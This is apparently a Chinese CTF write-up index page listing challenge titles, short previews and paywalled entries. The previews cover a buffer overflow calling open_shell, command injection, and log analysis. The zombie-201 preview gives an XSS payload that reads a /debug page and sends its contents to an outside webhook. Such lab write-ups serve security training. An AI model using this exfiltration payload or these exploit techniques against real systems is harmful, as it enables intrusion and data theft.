-
B0F1-[HackINI-2022]
下载附件,一个无后缀文件,推测一般是linux可执行文件,在kali尝试运行,发现运行逻辑为输入昵称回显昵称启动场景,给了一个nc连接,连接发现运行逻辑与附件相同把程序放进IDA分析,发现主要运行逻辑在say_my_name函数,注意到该函数用了gets函数,同时注意到程序有方法名为open_shell考虑构造缓冲区溢出访问open_shell函数,注意到以下片段s=byteptr-1Chleae...
- PWN
- 1天前
-
Personal_IP_Query-
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 8天前
-
A MISC
爆破压缩包密码得到qwer修改图片高度得到https://pan.baidu.com/s/1cG2QvYy3khpQGLfjfbYevg提取码cavb同样的做法importres=r"from%20t\),([0-9]*),1\)\)=([0-9]*)"pat=re.compile(s)f=open("timu.pcapng","rb")st=f.read().decode("utf-8","ig...
- MISC
- 8天前
-
TAMUctf2019 Science——ssti模板注入
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 15天前
-
zombie-201
进入题目是这个界面从第一个框传入payload,然后从第二个框中访问,具体如下:1.首先构造payloadfetch('{你的题目地址}/debug').then((response)=>response.text()).then(data=>fetch('{你的webhook地址}?data='+btoa(data)))由于http_only设置为了true,因此不能通过docume...
- WEB
- 19天前
-
SQL注入.2
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 21天前
-
签到题[NCTF - 2018] [WEB]
直接浏览器请求/index.php会自动执行/search/src=https%3A%2F%2Fpic.rmb.bdstatic.com%2Fbjh%2Fuser%2F0b75af50fffda1eaef389f0ef49d1e37.jpeg&refer=http%3A%2F%2Fwww.baidu.com&app=2021&size=r1,1&n=0&g=...
- WEB
- 26天前
-
签到题[miniLCTF-2020] [WEB]
看到首页中system知道a为传入的命令尝试ls/可以得到/下目录尝试执行/readflag显示一个字符串尝试使用cat等读取readflag看是不是正常文件显示乱码,搜索flag没信息,打开源代码查看并搜索flag显示如上一个表达式%d+%d=%d,可能这个readflag是一个交互式二进制文件我们尝试构造语句模拟输入echo-e生成交互式输入表示两个数字结果为100管道|将这些输入传递给/re...
- WEB
- 26天前
-
encod3r(HackINI-2023)
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 1月前
-
HaveFun
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 1月前
-
easymisc 二维码识别
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 1月前
-
[NUAACTF-2018]rev
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 1月前
-
[NUAACTF-2022]月色真美
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 1月前
-
Become a Rockstar
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 1月前
-
HECTF-Rem_You
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 1月前
-
HECTF-baby_sql
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
[网鼎杯-2018] I_like_pack
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- Reverse
- 1月前
-
简单日志分析.3
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 1月前
-
日志分析.2
二、黑客往/tmp目录写入一个文件,查找文件名搜索:tmpfindstr/S/I"tmp"access.log解析:通过遍历服务器的目录结构访问/tmp/sess_car使用&连接命令时,如果第一个命令失败,第二个命令仍然会被执行
- MISC
- 1月前
-
日志分析
日志分析.1一、任务描述网络存在源码泄漏,通过分析apache日志找出源码文件名思路:状态码:200常见的备份文件后缀:.rar.zip.7z.tar.gz.bak.txt.old.temp.phps.sql.mdb1、排查ctrl+F查找状态码:200www.zip成功响应说明网站源码为www.zip2、使用:findstr/S/I"200"access.log flag{www.zi...
- MISC
- 1月前